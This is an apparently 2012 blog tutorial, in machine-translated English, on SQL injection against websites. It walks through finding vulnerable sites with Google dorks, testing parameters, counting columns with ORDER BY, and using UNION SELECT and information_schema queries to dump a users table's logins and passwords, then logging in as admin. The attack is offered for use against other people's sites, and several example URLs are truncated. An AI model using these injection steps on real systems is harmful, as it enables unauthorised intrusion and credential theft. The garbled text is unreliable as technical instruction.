SQLi Step by Step written by r3m1ck

Bismilah hirahman nirahim Special thanks to Kharasan CyberArmy and All member,, thx bro you are my inspiration!!



Step by Step SQL injection



=== [1] == =

looking for a target, the target, to find you guys can put google dorks to SQLi example: http://www.target.site/index.php?id=69



=== [2] ===

after finding the target, the next step is to check whether the target can be inject or not.

How to check by adding the characters ' or-at the end of the url address.



example: http://www.target.site/index.php?id=69 '

http://www.target.site/index.php?id=69-

http://www.target.site/index.php?id=-69

if found an error like Warning: mysql_fetch_row (): supplied argument is not a valid MySQL result resource in/home/u198/domain/target.site/index.php on line 69 so that targets can be inject vuln/.



=== [3] ===

looking for and count the number of existing table in the database ... use the command: + order + by + or/**/order/**/by/**/

example: http://www.target.site/index.php?id=69+order+by+1--now checks for one example: http://www.target.site/index.php?id=69+o...r+by+2--to

http://www.target.site/index.php?id=69+o...+by+13--to

http://www.target.site/index.php?id=69+order+by+47--and

beyond making it appear error or missing error message ... i.e.

we find an error or message is lost in numbers 13: http://www.target.site/index.php?id=69+o...+13--means that we take is up to number 12



=== [4] ===

to issue numbers how many that appear use the command of the union because of the last error to number 13 use command + and + 1 = 2 + union + select + or/* */union/* */select/* */or/* */UNION/**/SELECT/**/ALL/**/then:



http://www.target.site/index.php?id=69+a...2C12--then it would appear the number 4 .7, 8 (this is called a magic number) use the command version () to check the sql version is used, the user's reply () to find out the name of the database user, () to find out the name of the database, the command input on the tsb yg figures out earlier examples:http://www.target.site/index.php?id=69+a...%2C12--see the version used, if version 4. x.x. xx leave it because in this 4 we have to ver guess own table and column imaginable on the web because it can not use the command + from + information_schema to version 5. x.x. xx means you don't need to guess the lucky table and column like ver 4 because in ver 5 can use command + from + information_schema



=== [5] ===

to show all the content of the table is the command group_concat(table_name)-> number placed last out and order baronial + from + the + INFORMATION_SCHEMA.tables where table_schema = database + ()---> entered after the last digit example: http://www.target.site/index.php?id=69+a...Ddatabase% 28% 29--find a table with a name like user, usr, username, login, user_name, user_admin, name, etc. in the admin_user is usually stored username and password.



in the example this is the users first edit Word users into hexa wear this tool r3m1ck converter tool the result is 75 73 65 72 73, eliminate spasinya be 7573657273



=== [6] ===

looking for a content table command: group_concat (column_name)-placed > number yg out last command: + from + information_schema. columns where table_name = + +---0xhexa > entered after the last number with the Word users replace hexa-hexa to convert examples : http://www.target.site/index.php?id=69+a...mn_name%29 .5 .6, user (), database () .9 .10,11 .12 + from + information_schema. columns + where + table_name = 0x7573657273--then the contents of the table users is id, login, password



=== [7] ===

see the contents of the column id, login password.

use the command: group_concat (0x3a, yg mau results content column removed)-> number placed last order baronial out + from + (name derived table)-after the last digit entered > example: http://www.target.site/index.php?id=69+a...sers--0x3a is a sign : (colon) === [8] === last step is looking for admin login page if you find a username + password that encrypt Please try, hopefully this tutorial useful for learning. the author is not responsible for any damage that you do.



wassalamu'alaikum warrohmatULLAH

SQLi Step by Step written by r3m1ck 2012-05-05T18:41:00-07:00 Rating: 4.5 Diposkan Oleh: r007-